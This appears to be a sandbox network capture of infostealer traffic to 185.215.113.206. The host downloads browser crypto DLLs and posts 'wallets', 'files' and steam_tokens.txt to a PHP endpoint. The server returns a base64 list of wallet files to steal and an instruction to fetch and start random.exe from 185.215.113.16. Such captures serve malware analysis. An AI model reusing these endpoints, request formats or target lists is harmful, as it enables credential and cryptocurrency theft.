Dec 14, 2024 23:59:04.330926895 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}U
Dec 14, 2024 23:59:04.332794905 CET	1236	IN	Data Raw: 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 51 50 e8 3f 96 06 00 83 c4 1c 5e 5f Data Ascii: Mt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^
Dec 14, 2024 23:59:04.332838058 CET	224	IN	Data Raw: 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 40 8d 04 3f 83 c0 fe 8d 04 40 89 c1 Data Ascii: T$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$
Dec 14, 2024 23:59:04.332874060 CET	1236	IN	Data Raw: 20 c1 e7 08 09 d7 0f b6 4c 24 24 09 f9 0f b6 d3 c1 e2 18 8b 5c 24 08 0f b6 ff c1 e7 10 09 d7 0f b6 5c 24 0c c1 e3 08 09 fb 0f b6 54 24 10 09 da 89 cb 31 c3 25 00 00 00 ff 81 e1 00 00 80 7f 31 c1 89 d8 25 00 00 ff 00 09 c8 89 d9 0f b6 fb 31 54 24 Data Ascii: L$$\$\$T$1%1%1T$D\|$@\|$t\$(D$\$(sFD$,D$s@D$,D$s<D$,sBD$,s@D$ ,D$ D$$D$$D$(D$GD$?D$D$1D$L$
Dec 14, 2024 23:59:04.332910061 CET	1236	IN	Data Raw: 00 00 00 29 c8 c1 f8 1f 8b 7d 1c 80 7c 37 f3 01 f7 d0 19 ff 09 c7 21 df 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 f8 1f 80 7c 32 f1 01 f7 d0 19 d2 09 c2 21 da 21 fa b8 07 00 00 00 29 c8 Data Ascii: )}\|7!!)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}
Dec 14, 2024 23:59:04.340413094 CET	148	IN	Data Raw: 00 00 00 89 fe 89 f0 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 00 85 ff 89 4d ec 89 55 f0 74 48 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff Data Ascii: ^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF
Dec 14, 2024 23:59:04.340943098 CET	1236	IN	Data Raw: 89 5e 04 8b 4b 04 ff 15 00 80 0a 10 ff d1 89 06 bb ff ff ff ff 85 c0 74 3d 89 f1 8b 55 10 ff 75 18 ff 75 14 e8 23 fc ff ff 83 c4 08 85 c0 74 1c 8b 3e 85 ff 74 20 8b 46 04 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 eb 0a 8b 45 ec 8b 4d f0 Data Ascii: ^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}E@HWVS^_[]USWVPM}G9vh
Dec 14, 2024 23:59:04.341072083 CET	1236	IN	Data Raw: 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f b6 14 06 0f b6 f9 01 d7 0f b6 8c 05 f0 fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 1c 06 88 14 3e 83 c0 02 eb b2 66 c7 86 00 01 00 00 00 00 89 f7 8b Data Ascii: >\>=t%>>fM1^_[]U}thuo]UVuE9sh;UMVuPu^]USWV4MEE9Eshy
Dec 14, 2024 23:59:04.349378109 CET	1236	IN	Data Raw: 66 0f 70 fe e8 66 0f 70 ed e8 66 0f 62 fd 66 0f 6e 6c 07 04 66 0f ef db 66 0f 60 eb 66 0f 61 eb 66 0f ef db 66 0f eb f9 66 0f 72 f4 17 66 0f fe 25 e0 20 08 10 f3 0f 5b cc 66 0f 70 e5 f5 66 0f f4 e9 66 0f 70 f5 e8 66 0f 70 c9 f5 66 0f f4 cc 66 0f Data Ascii: fpfpfbfnlff`fafffrf% [fpffpfpffpfbffof fnf`fafrfo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfp
Dec 14, 2024 23:59:06.058562994 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 23:59:06.500180960 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:06 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 14, 2024 23:59:07.618602037 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 23:59:08.056483030 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:07 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 14, 2024 23:59:09.135905981 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 23:59:09.573628902 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:09 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 14, 2024 23:59:12.993422031 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 23:59:13.433397055 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:13 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 14, 2024 23:59:14.322037935 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 23:59:14.759339094 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 14, 2024 23:59:16.095052004 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCF Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 23:59:17.188818932 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:59:17.506268024 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="message"wallets------BAKFCBFHJDHJKECAKEHI--
Dec 14, 2024 23:59:17.948404074 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 14, 2024 23:59:18.146101952 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBA Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 2d 2d 0d 0a Data Ascii: ------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="message"files------FBKECFIIEHCFHIECAFBA--
Dec 14, 2024 23:59:18.585418940 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:59:18.765758991 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file"------AEHIJKKFHIEGCBGCAFIJ--
Dec 14, 2024 23:59:19.695275068 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:59:19.724550009 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"ybncbhylepme------FCAAEHJDBKJJKFHJEBKF--
Dec 14, 2024 23:59:20.169348955 CET	271	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

